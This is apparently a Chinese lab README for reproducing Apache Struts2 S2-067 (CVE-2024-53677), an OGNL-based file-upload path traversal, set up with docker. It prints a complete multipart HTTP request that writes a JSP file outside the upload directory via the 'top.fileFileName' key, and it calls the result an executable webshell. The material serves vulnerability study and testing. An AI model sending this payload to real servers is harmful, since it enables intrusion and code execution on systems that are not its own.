# Struts2 S2-067 文件上传路径穿越漏洞(CVE-2024-53677) Apache Struts2 是一个流行的开源 Web 应用框架,用于开发 Java EE Web 应用。它使用并扩展了 Java Servlet API,鼓励开发者采用模型-视图-控制器(MVC)架构。该框架为开发者提供了丰富的标签和实用工具,以创建易于维护和扩展的企业级 Web 应用。 S2-067 是 S2-066 漏洞的变种,产生于对 S2-066 的不完全修复。S2-066 是由于大小写敏感性比较问题导致文件名被覆盖而造成目录穿越,而 S2-067 则利用了另一种机制达到相同的目的。 在 Struts2 中,所有参数在传递时,参数的键名都会进行 OGNL 表达式的计算。这个特性历史上曾导致多次通过 OGNL 表达式注入实现远程命令执行的漏洞。虽然 Struts2 已经实现了严格的参数键名验证来防止 RCE 漏洞,但表达式计算仍然会发生。S2-067 就是利用这个表达式计算机制,再次覆盖上传文件时的文件名,最终导致目录穿越问题。 参考链接: - - ## 环境搭建 执行以下命令启动一个用 Struts2 2.5.33 编写的 Web 服务器: ``` docker compose up -d ``` 环境启动后,访问 `http://your-ip:8080` 即可看到应用页面,这是一个简单的文件上传页面。 ## 漏洞复现 在复现 S2-067 漏洞之前,需要先阅读 [S2-066](../s2-066/README.md) 并理解漏洞的原理。 在这个环境中,我们已经不能使用与 S2-066 相同的 payload,因为大小写敏感性问题已被修复: ![](1.png) 将 OGNL 表达式 `top.fileFileName` 作为文件名参数键名的一部分,文件将再次被上传到受限上传目录之外: ``` POST /index.action HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl6ZFZPznNSPZOFJF Content-Length: 335 ------WebKitFormBoundaryl6ZFZPznNSPZOFJF Content-Disposition: form-data; name="file"; filename="shell.jsp" Content-Type: text/plain <% out.println("hello world"); %> ------WebKitFormBoundaryl6ZFZPznNSPZOFJF Content-Disposition: form-data; name="top.fileFileName" ../shell.jsp ------WebKitFormBoundaryl6ZFZPznNSPZOFJF-- ``` 注意利用过程中的关键要素: - 不同于 S2-066 利用大小写敏感性,这里使用了参数键名中的 OGNL 表达式计算 - 参数键名 `top.fileFileName` 会被作为 OGNL 表达式进行计算 - 这个计算允许我们使用路径穿越 payload `../shell.jsp` 覆盖文件名 ![成功上传](2.png) JSP 文件现在被上传到了受限上传目录之外,并且可以被执行: ![Webshell 执行](3.png) 现在你可以通过访问 `http://your-ip:8080/shell.jsp` 来访问 webshell。